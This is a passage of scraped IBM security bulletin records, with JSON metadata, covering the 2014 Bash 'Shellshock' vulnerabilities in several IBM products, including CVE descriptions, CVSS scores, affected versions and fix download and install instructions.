\n[_CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96687_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nAll IBM PureData System for Analytics (Netezza) appliances operating on RedHat 5.3-5.10 and RedHat 6.2-6.5.\n\n## Remediation/Fixes\n\nIBM Netezza Host Management\n\n| 5.3.1| None| [http://www-933.ibm.com/support/fixcentral/swg/doSelectFixes?options.selectedFixes=5.3.1.0-IM-Netezza-HOSTMGMT-fp89859&continue=1](<http://www-933.ibm.com/support/fixcentral/swg/doSelectFixes?options.selectedFixes=5.3.1.0-IM-Netezza-HOSTMGMT-fp89859&continue=1>) \n---|---|---|--- \n \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n\n## Workarounds and Mitigations\n\nNone known\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n[_Subscribe to Security Bulletins_](<http://www.ibm.com/support/mynotifications/>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n31 October 2014: Updated for revised CVSS base scores \n07 October 2014: Original Version Published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SSULQD\",\"label\":\"IBM PureData System\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Component\":\"Administration\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"1.0.0\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-18T03:10:29", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect IBM Netezza Host Management (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2019-10-18T03:10:29", "id": "BADBBFD3B80B37BA80822E3D89F7CE0842CD6F0C0F9476386BC6B381BF85302E", "href": "https://www.ibm.com/support/pages/node/253033", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T12:50:49", "description": "## Summary\n\nBash vulnerabilities were disclosed in September 2014. These vulnerabilities have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d. Bash is optionally available via the AIX Toolbox for Linux Applications web download: http://www.ibm.com/systems/power/software/aix/linux/ \n \nIf you have bash installed, read further below for Remediation/Fixes. \n \nUPDATE: Cumulative Fixes provided to include four new CVEs: CVE-2014-6277, CVE-2014-6278, CVE-2014-7186, and CVE-2014-7187.\n\n## Vulnerability Details\n\nCVE-ID: CVE-2014-6271 \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96153> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \nCVE-2014-6277 \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96686> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \nCVE-2014-6278 \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96687> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \nCVE-ID: CVE-2014-7169 \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96209> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \nCVE-2014-7186 \nDescription: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96237> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n \nCVE-2014-7187 \nGNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96238> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P)\n\n## Affected Products and Versions\n\nToolbox for Linux Applications: bash. Affected version: 4.2-2 and lower\n\n## Remediation/Fixes\n\nCommand to verify vulnerability: \n\"rpm -q bash\" \nResult: If this output shows \"bash-4.2-2\" (or any number lower than 4.2), then you are vulnerable. \n \nIf you are vulnerable: \nInstall bash-4.2-3 (the \"-3\" is revision #3, which is the update that includes the fixes). \n \nDownload link for AIX 6.1 and above: \n<ftp://ftp.software.ibm.com/aix/freeSoftware/aixtoolbox/RPMS/ppc/bash/bash-4.2-3.aix6.1.ppc.rpm> \nOptional documentation download: \n<ftp://ftp.software.ibm.com/aix/freeSoftware/aixtoolbox/RPMS/ppc/bash/bash-doc-4.2-2.aix6.1.ppc.rpm> \n \nInstall: \nAs root, execute the command: \"rpm -hUv bash-4.2-3.aix6.1.ppc.rpm\" \n \nOptionally install documentation: \n\"rpm -hUv bash-4.2-3.aix6.1.ppc.rpm bash-doc-4.2-2.aix6.1.ppc.rpm\" \n \nDownload link for AIX 5.3: \n<ftp://ftp.software.ibm.com/aix/freeSoftware/aixtoolbox/RPMS/ppc/bash/bash-4.2-3.aix5.3.ppc.rpm> \nOptional documentation download: \n<ftp://ftp.software.ibm.com/aix/freeSoftware/aixtoolbox/RPMS/ppc/bash/bash-doc-4.2-2.aix5.3.ppc.rpm> \n \nInstall: \nAs root, execute the command: \"rpm -hUv bash-4.2-3.aix5.3.ppc.rpm \n \nOptionally install documentation: \n\"rpm -hUv bash-4.2-3.aix5.3.ppc.rpm bash-doc-4.2-2.aix5.3.ppc.rpm\" \n \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including other Operating Systems and take appropriate mitigation and remediation actions. Please contact your respective Operating System provider for more information.\n\n## Workarounds and Mitigations\n\nNone needed\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\nAIX Toolbox for Linux Applications: \n<http://www.ibm.com/systems/power/software/aix/linux/toolbox/download.html>\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\nAdded AIX 5.3 fix link \nUpdated cumulative Fixes provided; bash 4.2-3\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SWG10\",\"label\":\"AIX\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"}],\"Version\":\"5.3;6.1;7.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB08\",\"label\":\"Cognitive Systems\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:14:52", "type": "ibm", "title": "Security Bulletin: UPDATE: Vulnerabilities in Bash affect AIX Toolbox for Linux Applications (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2021-09-15T12:14:52", "id": "1C6641956F91BACFC5632640A3A0F7C2D3293056B631EF470EE3E313F25B9DCA", "href": "https://www.ibm.com/support/pages/node/679539", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:05:44", "description": "## Summary\n\nIBM PureApplication System is shipped as a component of IBM InfoSphere Information Server Hypervisor edition. Information about a security vulnerability affecting IBM PureApplication System has been published in a security bulletin. Other than the Information Server Hypervisor edition, Information Server and its components are not vulnerable.\n\n## Vulnerability Details\n\nPlease consult the security bulletin, [Vulnerabilities in Bash affect IBM PureApplication System (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)](<http://www-01.ibm.com/support/docview.wss?uid=swg21686246>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nInfoSphere Information Server Hypervisor Edition version 9.1 on Red Hat Linux \nNOTE: No other versions of InfoSphere Information Server are affected by this vulnerability.| PureApplication System versions 1.0.0.0 to 1.1.0.2 \n \n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n09 October 2014: Original Version Published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Internal Use Only\n\nPSIRTs 42771 and 43145\n\n[{\"Product\":{\"code\":\"SSZJPZ\",\"label\":\"IBM InfoSphere Information Server\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"Hypervisor Edition Packages for Red Hat Enterprise Linux Server\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"9.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}},{\"Product\":{\"code\":\"SSZJPZ\",\"label\":\"IBM InfoSphere Information Server\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T14:07:18", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM PureApplication System shipped with IBM InfoSphere Information Server Hypervisor edition (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2018-06-16T14:07:18", "id": "1F0A215E22C30EB485B1D487514AF1026F43B577C62A1AE805C2C9DCDDF2A921", "href": "https://www.ibm.com/support/pages/node/252535", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:13:32", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by the IBM Smart Analytics System 7600, 7700, and 7710.\n\n## Vulnerability Details\n\n \n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96153_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96209_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96237_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96238_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n**CVE-ID**: [_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96686_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96687_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nIBM Smart Analytics System 7600 \nIBM Smart Analytics System 7700 \nIBM Smart Analytics System 7710\n\n## Remediation/Fixes\n\nFor each affected component in the table, download the recommended fix, and install using the link in the **Installation instructions** column. \n \nFor more information about IBM IDs, see the [Help and FAQ](<https://www.ibm.com/account/profile/us?page=faqhelp>). \n \n\n\n**IBM Smart Analytics System 7600** \n--- \n**Affected Component**| **Recommended Fix**| **Download Link**| **Installation Instructions** \nIBM Power Hardware Management Console (HMC) V7 R7.9.0| Install V7 R7.9.0 SP1 MH01428 and MH01473| [IBM Fix Central: V7 R7.9.0 SP1 MH01428](<http://www.ibm.com/support/fixcentral/main/quickorder?product=ibm/hmc/9100HMC&release=V7R7.9.0&platform=All&function=fixId&fixids=MH01428&includeRequisites=0&includeSupersedes=0&downloadMethod=ddp&source=fc>) \n \n[IBM Fix Central: MH01473](<http://www.ibm.com/support/fixcentral/main/quickorder?product=ibm/hmc/9100HMC&release=V7R7.9.0&platform=All&function=fixId&fixids=MH01473&includeRequisites=0&includeSupersedes=0&downloadMethod=ddp&source=fc>)| [Installing a IBM Hardware Management Console fix in an IBM Smart Analytics System or IBM PureData System for Operational Analytics environment](<http://www-01.ibm.com/support/docview.wss?uid=swg21671109#mh01425>) \nIBM System Storage SAN40B (Brocade)| Upgrade to 7.2.1c1| [Brocade: FOS 7.2.1c1](<ftp://testcase.software.ibm.com/fromibm/hw/brocade_fos_7.2.1c1/>)| [Installing an IBM System Storage SAN switch firmware update in an IBM Smart Analytics System or IBM PureData System for Operational Analytics environment](<http://www.ibm.com/support/docview.wss?uid=swg21686554>) \n**IBM Smart Analytics System 7700** \n**Affected Component**| **Recommended Fix**| **Download Link**| **Installation Instructions** \nIBM Power Hardware Management Console (HMC) V7 R7.7.0 SP2| Install fix MH01480| [IBM Fix Central: MH01480](<http://www.ibm.com/support/fixcentral/main/quickorder?product=ibm/hmc/9100HMC&release=V7R7.7.0&platform=All&function=fixId&fixids=MH01480&includeRequisites=0&includeSupersedes=0&downloadMethod=ddp&source=fc>)| [Installing a IBM Hardware Management Console fix in an IBM Smart Analytics System or IBM PureData System for Operational Analytics environment](<http://www-01.ibm.com/support/docview.wss?uid=swg21671109#mh01425>) \nIBM System Storage SAN40B (Brocade)| Upgrade to 7.2.1c1| [Brocade: FOS 7.2.1c1](<ftp://testcase.software.ibm.com/fromibm/hw/brocade_fos_7.2.1c1/>)| [Installing an IBM System Storage SAN switch firmware update in an IBM Smart Analytics System or IBM PureData System for Operational Analytics environment](<http://www.ibm.com/support/docview.wss?uid=swg21686554>) \n**IBM Smart Analytics System 7710** \n**Affected Component**| **Recommended Fix**| **Download Link**| **Installation Instructions** \nIBM Power Hardware Management Console (HMC) V7 R7.7.0 SP2| Install fix MH01480| [IBM Fix Central: MH01480](<http://www.ibm.com/support/fixcentral/main/quickorder?product=ibm/hmc/9100HMC&release=V7R7.7.0&platform=All&function=fixId&fixids=MH01480&includeRequisites=0&includeSupersedes=0&downloadMethod=ddp&source=fc>)| [Installing a IBM Hardware Management Console fix in an IBM Smart Analytics System or IBM PureData System for Operational Analytics environment](<http://www-01.ibm.com/support/docview.wss?uid=swg21671109#mh01425>) \n \n**For assistance, contact IBM Support:**\n\n * In the United States and Canada dial **1-800-IBM-SERV**\n * View the support [contacts for other countries](<http://www.ibm.com/planetwide/>) outside of the United States.\n * Electronically [open a Service Request](<http://www.ibm.com/software/data/db2/support/db2_9/probsub.html>) with IBM Support.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\nOctober 10, 2014: Original version published.\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES 